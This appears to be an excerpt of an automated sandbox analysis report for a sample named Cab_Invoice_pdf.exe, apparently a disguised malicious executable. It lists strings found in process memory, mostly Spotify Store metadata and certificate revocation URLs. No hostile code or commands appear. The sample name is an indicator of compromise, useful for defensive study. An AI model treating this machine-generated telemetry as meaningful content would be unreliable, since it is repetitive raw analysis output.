Source: svchost.exe, 0000000C.00000003.394303683.0000020D183A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.394282413.0000020D18391000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000C.00000003.394303683.0000020D183A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.394282413.0000020D18391000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 0000000C.00000002.410422151.0000020D17AE9000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563859154.00000000030A5000.00000004.00000001.sdmpString found in binary or memory: http://crl.p
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crldn
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crle
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563859154.00000000030A5000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl:
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crlACE
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crlR
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crlT
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crlXx
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crlb
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crld
Source: svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 0000000C.00000002.410422151.0000020D17AE9000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563859154.00000000030A5000.00000004.00000001.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crl
